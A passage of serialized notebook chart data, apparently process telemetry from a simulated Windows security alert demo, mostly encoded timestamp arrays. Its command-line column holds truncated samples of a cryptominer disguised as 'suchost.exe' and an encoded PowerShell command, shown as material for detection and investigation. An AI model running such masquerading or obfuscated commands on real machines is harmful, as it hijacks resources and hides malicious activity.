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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[658]},\"TimeGenerated_orig_par\":{\"__ndarray__\":\"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d412QgAQpDd3jXZCABCkN3eNdkIAEKQ3d412QgAQpDd3jXZCABCkN3eNdkIAEKQ3d412QgAQpDd3jXZCABCkN3eNdkIAEKQ3d412QgAQpDd3jXZCABCkN3eNdkIAEKQ3d412QgAQpDd3jXZCABCkN3eNdkIAEKQ3d412QgAQpDd3jXZCABCkN3eNdkIAEKQ3d412QgBQsAR3jXZCAFCwBHeNdkIAULAEd412QgBQsAR3jXZCAFCwBHeNdkIAULAEd412QgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARg57jXZCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgaVGBjXZCACBpUYGNdkIAIGlRgY12QgAgaVGBjXZCACBpUYGNdkIAIGlRgY12QgAgaVGBjXZCACBpUYGNdkIAIGlRgY12QgAgaVGBjXZCACBpUYGNdkIAIGlRgY12QgAgaVGBjXZCACBpUYGNdkIAIGlRgY12QgAgaVGBjXZCACBpUYGNdkIAIGlRgY12QgAgaVGBjXZCACBpUYGNdkIAIGlRgY12QgAgaVGBjXZCACBpUYGNdkIAIGlRgY12QgAgaVGBjXZCADBKgYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIA8HmBgY12QgDweYGBjXZCAPB5gYGNdkIAIGlRgY12QgAgaVGBjXZCACBpUYGNdkIAIGlRgY12QgAgaVGBjXZCACBpUYGNdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[658]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"cmd\":[\"cmdline unknown\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Begin Security Demo tasks\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; ianhelle@microsof...\",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.0...\",\".\\\\powershell -Noninteractive -Noprofile -Command ...\",\".\\\\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2Z...\",\"cmd /c echo End Security Demo tasks\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\speech_onecore\\\\common\\\\SpeechMo...\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 8 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -10918 /...\",\"ping 127.0.0.1 -n 17 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 0 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c 